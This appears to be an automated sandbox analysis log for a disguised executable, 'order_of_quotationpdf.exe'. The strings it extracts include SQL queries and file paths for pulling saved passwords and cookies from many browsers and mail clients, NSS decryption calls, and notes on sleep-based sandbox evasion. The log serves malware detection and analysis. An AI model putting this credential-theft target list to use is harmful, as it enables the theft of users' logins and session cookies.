Source: order_of_quotationpdf.exe, 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: order_of_quotationpdf.exe, 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: order_of_quotationpdf.exe, 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Profile %dDefault\.tmp\.tmpselect signon_realm, origin_url, username_value, password_value from wow_loginsselect signon_realm, origin_url, username_value, password_value from loginsPassword\.tmp\.tmpselect host_key, path, name, encrypted_value, expires_utc, is_httponly, samesite, is_secure from cookiesPassword\Mozilla\Firefox\profiles.iniProfilePath\cookies.sqlite\Blisk\User Data\Local StateSELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies\Google\Chrome\User Data\Local State\Torch\User Data\Local State\Google\Chrome\User Data\Default\Network\CookiesPath\Microsoft\Edge\User Data\Local Statesoftokn3.dll\Microsoft\Edge\User Data\Default\Network\Cookiesmsvcp140.dll\Google\Chrome\User Data\Local Statemozglue.dllvcruntime140.dll\Google\Chrome\User Data\Default\Login Data\Google\Chrome Beta\User Data\Local Statenss3.dll\Google\Chrome Beta\User Data\Default\Login Datafreebl3.dll\\Epic Privacy Browser\User Data\Local State\Epic Privacy Browser\User Data\Default\Login Data\Microsoft\Edge\User Data\Local Statenss3.dll\Microsoft\Edge\User Data\Default\Login Datamsvcr120.dll\UCBrowser\User Data_i18n\Local Statemsvcp120.dll\UCBrowser\User Data_i18n\Default\UC Login Data.17\Tencent\QQBrowser\User Data\Local Statemozglue.dllsoftokn3.dll\Tencent\QQBrowser\User Data\Default\Login Data\Opera Software\Opera Stable\Local Statevcruntime140.dll\Opera Software\Opera Stable\Login Data\Blisk\User Data\Default\Login Data\Chromium\User Data\Local State\Chromium\User Data\Default\Login Data\BraveSoftware\Brave-Browser\User Data\Local State\BraveSoftware\Brave-Browser\User Data\Default\Login Data\Vivaldi\User Data\Local Statemsvcp\Vivaldi\User Data\Default\Login Datamsvcr\Comodo\Dragon\User Data\Local State.dll\Comodo\Dragon\User Data\Default\Login Data\Torch\User Data\Default\Login Data\Slimjet\User Data\Local State\Slimjet\User Data\Default\Login Data.dll\CentBrowser\User Data\Local State\CentBrowser\User Data\Default\Login DataNSS_InitSoftware\Microsoft\Windows\CurrentVersion\App Paths\PK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetError\nss3.dllmsvcr120.dllmsvcp120.dllmozglue.dllsoftokn3.dllmsvcpmsvcr.dll.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultGetItemVaultFreeInternet ExplorerInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.iniProfilePathProfile\logins.json\.tmpencryptedUsernamehostnameencryptedUsernameencryptedPasswordProfilethunderbird.exe\Thunderbird\profiles.iniProfilePathProfile\logins.json\.tmpencryptedUsernamehostnameencryptedUsernameencryptedPasswordCould not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676S
Source: order_of_quotationpdf.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: order_of_quotationpdf.exe, 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_3-16294

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-16827

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6724	Thread sleep count: 5465 > 30	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99826s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99464s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99333s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -99098s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98973s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98731s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98618s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98279s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98161s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6732	Thread sleep time: -97166s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe TID: 6728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,

3_2_0041B7F0

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Window / User API: threadDelayed 5465			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9589			Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-16251

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99826	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99687	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99578	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99464	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99333	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 99098	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98973	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98859	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98731	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98618	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98390	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98279	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98161	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97937	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97718	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 97166	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041EF90 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

3_2_0041EF90

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	API call chain: ExitProcess graph end node	graph_3-18587
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	API call chain: ExitProcess graph end node	graph_3-16288
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	API call chain: ExitProcess graph end node	graph_3-17555

Source: order_of_quotationpdf.exe, 00000000.00000002.403702742.000000000698B000.00000004.00000020.00020000.00000000.sdmp

